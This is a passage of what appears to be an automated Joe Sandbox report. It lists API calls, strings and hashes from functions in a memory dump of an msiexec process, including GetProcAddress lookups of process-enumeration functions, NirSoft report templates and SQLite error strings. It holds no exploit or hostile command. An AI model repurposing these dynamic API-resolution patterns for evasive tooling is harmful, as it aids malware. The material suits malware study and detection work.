                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                                                                • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                                                • API String ID: 2012295524-70141382
                                                                                                                                                • Opcode ID: 95a5228713fab25b9356939e1698f0342648b454f81c78f9b3678221df1ca411
                                                                                                                                                • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                                                                                                                                • Opcode Fuzzy Hash: 95a5228713fab25b9356939e1698f0342648b454f81c78f9b3678221df1ca411
                                                                                                                                                • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                                                                                                                                APIs
                                                                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressProc$HandleModule
                                                                                                                                                • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                                                                • API String ID: 667068680-3953557276
                                                                                                                                                • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                                                                                • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                                                                                                                                • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                                                                                • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                                                                                                                                APIs
                                                                                                                                                • GetDC.USER32(00000000), ref: 004121FF
                                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                                                                                                                • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                                                                                                                • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                                                                                                                • SelectObject.GDI32(?,?), ref: 00412251
                                                                                                                                                • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                                                                                                                • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                                                                                                  • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                                                                                                  • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                                                                                                  • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                                                                                                                • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                                                                                                                • SetCursor.USER32(00000000), ref: 004122BC
                                                                                                                                                • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                                                                                                                • memcpy.MSVCRT(?,?,00002008), ref: 0041234D
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1700100422-0
                                                                                                                                                • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                                                                                • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                                                                                                                • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                                                                                • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                                                                                                                APIs
                                                                                                                                                • GetClientRect.USER32(?,?), ref: 004111E0
                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 004111F6
                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 0041120C
                                                                                                                                                • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                                                                                                                • GetWindowRect.USER32(00000000), ref: 0041124D
                                                                                                                                                • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                                                                                                                • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                                                                                                                • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                                                                                                                • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                                                                                                                • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                                                                                                                • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                                                                                                                • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 552707033-0
                                                                                                                                                • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                                                                • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                                                                                                                • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                                                                • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$_snwprintf
                                                                                                                                                • String ID: %%0.%df
                                                                                                                                                • API String ID: 3473751417-763548558
                                                                                                                                                • Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                                                                                                • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                                                                                                                                • Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                                                                                                • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                                                                                                                                APIs
                                                                                                                                                • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                                                                                                                • KillTimer.USER32(?,00000041), ref: 004060D7
                                                                                                                                                • KillTimer.USER32(?,00000041), ref: 004060E8
                                                                                                                                                • GetTickCount.KERNEL32 ref: 0040610B
                                                                                                                                                • GetParent.USER32(?), ref: 00406136
                                                                                                                                                • SendMessageW.USER32(00000000), ref: 0040613D
                                                                                                                                                • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                                                                                                                • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                                                                                                                • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                                                                                                • String ID: A
                                                                                                                                                • API String ID: 2892645895-3554254475
                                                                                                                                                • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                                                                • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                                                                                                                • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                                                                • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                                                                                                                APIs
                                                                                                                                                • LoadMenuW.USER32(?,?), ref: 0040D97F
                                                                                                                                                  • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                                                                                                                                  • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                                                                                                                                  • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                                                                                                                                  • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                                                                                                                                • DestroyMenu.USER32(00000000), ref: 0040D99D
                                                                                                                                                • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                                                                                                                                • GetDesktopWindow.USER32 ref: 0040D9FD
                                                                                                                                                • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                                                                                                                                • memset.MSVCRT ref: 0040DA23
                                                                                                                                                • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                                                                                                                                • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                                                                                                                                • DestroyWindow.USER32(00000005), ref: 0040DA70
                                                                                                                                                  • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                                                                                                • String ID: caption
                                                                                                                                                • API String ID: 973020956-4135340389
                                                                                                                                                • Opcode ID: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                                                                                                                • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                                                                                                                                                • Opcode Fuzzy Hash: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                                                                                                                • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                                                                                                                                • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                                                                                                                                • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                                                                                                                                • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$_snwprintf$wcscpy
                                                                                                                                                • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                                                                                • API String ID: 1283228442-2366825230
                                                                                                                                                • Opcode ID: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                                                                                                                • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                                                                                                                                                • Opcode Fuzzy Hash: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                                                                                                                • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                                                                                                                                                APIs
                                                                                                                                                • wcschr.MSVCRT ref: 00413972
                                                                                                                                                • wcscpy.MSVCRT ref: 00413982
                                                                                                                                                  • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                                                                  • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                                                                  • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                                                                                • wcscpy.MSVCRT ref: 004139D1
                                                                                                                                                • wcscat.MSVCRT ref: 004139DC
                                                                                                                                                • memset.MSVCRT ref: 004139B8
                                                                                                                                                  • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                                                                                                                                  • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                                                                                                                                • memset.MSVCRT ref: 00413A00
                                                                                                                                                • memcpy.MSVCRT(?,?,00000004,?,?,00000000,00000208,?), ref: 00413A1B
                                                                                                                                                • wcscat.MSVCRT ref: 00413A27
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                                                                                                • String ID: \systemroot
                                                                                                                                                • API String ID: 4173585201-1821301763
                                                                                                                                                • Opcode ID: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                                                                                                • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                                                                                                                                • Opcode Fuzzy Hash: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                                                                                                • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: wcscpy
                                                                                                                                                • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                                                                                                • API String ID: 1284135714-318151290
                                                                                                                                                • Opcode ID: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                                                                                                                                • Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
                                                                                                                                                • Opcode Fuzzy Hash: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                                                                                                                                • Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                                                                                                                  • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                                                                                                                  • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                                                                                • memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
                                                                                                                                                • strchr.MSVCRT ref: 0040C140
                                                                                                                                                • strchr.MSVCRT ref: 0040C151
                                                                                                                                                • _strlwr.MSVCRT ref: 0040C15F
                                                                                                                                                • memset.MSVCRT ref: 0040C17A
                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Filememcpystrchr$CloseHandlePointerSize_memicmp_strlwrmemset
                                                                                                                                                • String ID: 4$h
                                                                                                                                                • API String ID: 4019544885-1856150674
                                                                                                                                                • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                                                                                • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                                                                                                                • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                                                                                • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                                                                                                • String ID: 0$6
                                                                                                                                                • API String ID: 4066108131-3849865405
                                                                                                                                                • Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                                                                                                • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                                                                                                                • Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                                                                                                • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 004082EF
                                                                                                                                                  • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                • memset.MSVCRT ref: 00408362
                                                                                                                                                • memset.MSVCRT ref: 00408377
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$ByteCharMultiWide
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 290601579-0
                                                                                                                                                • Opcode ID: c60d666c950e1de6cba0954a24524a9e41ca0abebb320c38a87f7a6f74f5840a
                                                                                                                                                • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                                                                                                                • Opcode Fuzzy Hash: c60d666c950e1de6cba0954a24524a9e41ca0abebb320c38a87f7a6f74f5840a
                                                                                                                                                • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
APIs
• memchr.MSVCRT ref: 00444EBF
• memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
• memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
• memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
• memcpy.MSVCRT(?,0044EB0C,0000000B), ref: 00444FAF
• memcpy.MSVCRT(?,00000001,00000008), ref: 00444FC1
• memcpy.MSVCRT(PD,?,00000008,?,?), ref: 00445010
• memset.MSVCRT ref: 0044505E
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: memcpy$memchrmemset
• String ID: PD$PD
• API String ID: 1581201632-2312785699
APIs
• GetSystemMetrics.USER32(00000011), ref: 00409F5B
• GetSystemMetrics.USER32(00000010), ref: 00409F61
• GetDC.USER32(00000000), ref: 00409F6E
• GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
• GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
• ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
• GetWindowRect.USER32(?,?), ref: 00409FA0
• GetParent.USER32(?), ref: 00409FA5
• GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
• MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
Memory Dump Source
• Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
• String ID:
• API String ID: 2163313125-0
APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: free$wcslen
• String ID:
• API String ID: 3592753638-3916222277
APIs
• memset.MSVCRT ref: 0040A47B
• _snwprintf.MSVCRT ref: 0040A4AE
• wcslen.MSVCRT ref: 0040A4BA
• memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
• wcslen.MSVCRT ref: 0040A4E0
• memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: memcpywcslen$_snwprintfmemset
• String ID: %s (%s)$YV@
• API String ID: 3979103747-598926743
APIs
• LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
• FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
• wcslen.MSVCRT ref: 0040A6B1
• wcscpy.MSVCRT ref: 0040A6C1
• LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
• wcscpy.MSVCRT ref: 0040A6DB
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
• String ID: Unknown Error$netmsg.dll
• API String ID: 2767993716-572158859
APIs
  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
• wcscpy.MSVCRT ref: 0040DAFB
• wcscpy.MSVCRT ref: 0040DB0B
• GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
  • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: PrivateProfilewcscpy$AttributesFileString
• String ID: TranslatorName$TranslatorURL$charset$general$rtl
• API String ID: 3176057301-2039793938
APIs
Strings
• database %s is already in use, xrefs: 0042F6C5
• attached databases must use the same text encoding as main database, xrefs: 0042F76F
• database is already attached, xrefs: 0042F721
• unable to open database: %s, xrefs: 0042F84E
• out of memory, xrefs: 0042F865
• too many attached databases - max %d, xrefs: 0042F64D
• cannot ATTACH database within transaction, xrefs: 0042F663
Memory Dump Source
• Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: memcpymemset
• String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
• API String ID: 1297977491-2001300268
APIs
  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
• ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040EB3F
• ??2@YAPAXI@Z.MSVCRT(00000000,00000000), ref: 0040EB5B
• memcpy.MSVCRT(?,0045A248,00000014), ref: 0040EB80
• memcpy.MSVCRT(?,0045A234,00000014,?,0045A248,00000014), ref: 0040EB94
• ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040EC17
• ??2@YAPAXI@Z.MSVCRT(0000000C,00000000), ref: 0040EC21
• ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040EC59
  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
  • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
